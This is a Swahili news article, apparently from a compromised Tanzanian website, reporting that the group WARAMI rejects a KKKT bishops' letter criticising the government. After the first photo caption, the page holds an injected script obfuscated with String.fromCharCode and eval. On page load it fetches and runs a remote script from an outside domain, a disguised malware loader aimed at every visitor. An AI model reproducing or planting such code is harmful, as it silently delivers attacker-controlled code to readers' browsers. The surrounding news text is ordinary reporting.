Recent Comments

Asasi yakosoa waraka uliotolewa na maaskofu wa KKKT

<p>Philipo Mwakibinga Mkurugenzi wa Utafiti WARAMI akizungumza na waandishi wa habari leo wakati taasisi hiyo ilipotoa taarifa kuhusu waraka wa maaskofu wa KKKT.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na Steven Samwel – Dar es Salaam.

Asasi ya Watetezi wa Rasilimali Wasio na Mipaka yaani WARAMI, imekosoa waraka uliotolewa na maaskofu wa Kanisa la Kiinjili la Kilutheri Tanzania KKKT, kwa madai kuwa waraka huo umejaa maudhui yanayoikosoa serikali, madai ambayo taasisi hiyo imedai kuwa siyo na ukweli.

Mkurugenzi wa Utafiti wa WARAMI Bw. Philipo Mwakibinga, amesema mambo mengi yaliyoelezwa ndani ya waraka huo ni ya uongo na yenye mrengo wa kisiasa na kuwataka viongozi hao wa kiroho kutafakari matamko yao kabla ya kuyatoa hadharani ili kuepusha mtafaruku ndani ya jamii.

“JANA tuliona katika mitandao ya kijamii waraka wa viongozi wetu wa dini,ukizungumzia masuala mbali mbali ya nchi na mwelekeo wake huku sehemu kubwa ya waraka huo ukijikita katika kuikosoa serikali juu ya namna inavyoendeshwa” amesema Mwakibinga.

Akifafanua juu ya hoja yake hiyo; Bw. Mwakibinga amesema kosoa kosoa iliyomo ndani ya waraka huo haifanani na uhalisia wa jinsi serikali ya awamu ya tano inavyoshughulikia kero za wananchi na hasa jinsi inavyopambana na wizi na ubadhirifu wa rasilimali za umma.

Philipo Mwakibinga Mkurugenzi wa Utafiti WARAMI akizungumza na waandishi wa habari leo wakati taasisi hiyo ilipotoa taarifa kuhusu waraka wa maaskofu wa KKKT.

Sisi  Watetezi wa Rasiliamli wasio na mipaka (WARAMI) tunaamini kuwa moja wa wajibu wetu ni kuhakikisha  Jamii inapatiwa haki hiyo pasipo upendeleo wa aina yoyote ule wa kiimani, kisiasa kanda au hata kiukabila.

“Inapotokea mazingira yoyote ya viongozi wetu wa dini kushindwa kusimamia wajibu huo jamii inayoongozwa na viongozi hao inapaswa ijisimamie yenyewe na kuwakumbusha wajibu wao huo”, amesema Mwakibinga na kuongeza kuwa

“Kwa vyovyote vile tunaona ni sahihi kwa sasa nasi kupaza sauti yetu kwa jamii ili pamoja na viongozi wetu hawa wa dini wakiwemo maaskofu wa KKKT tuone ni namna gani bora ya kuishi katika jamii ambamo watu wake wamechanganyika kwa utofauti tofauti  baina ya dini, kabila, jinsia, ufuasi wa kiitikadi na kadhalika.

Kiongozi huyo wa WARAMI amesema “Tunatumia nafasi hii kuwakumbusha viongozi wetu wa dini wajitafakari kwa umakini na kuanza kuchagua aina ya maneno ama kauli sambamba na njia wanazotumia ili kutokuleta taharuki kwa jamii hasa wakizingatia ukweli kwamba mara nyingi sio kila maoni wanayoona wao yanafaa basi kwetu sisi waumini wao pia yanafaa kwa maana tuyafuate kama yalivyo”.

Miongoni mwa masuala yaliyoandikwa katika waraka ule wa maaskofu wetu ni malalamiko kuhusu Katiba Mpya, Uhuru wa kutoa maoni, Usawa katika elimu, mauaji ya watu, uchumi Demokrasi, kodi kwa wafanyabiashara na ajira kwa vijana kwa kuyataja kwa uchache.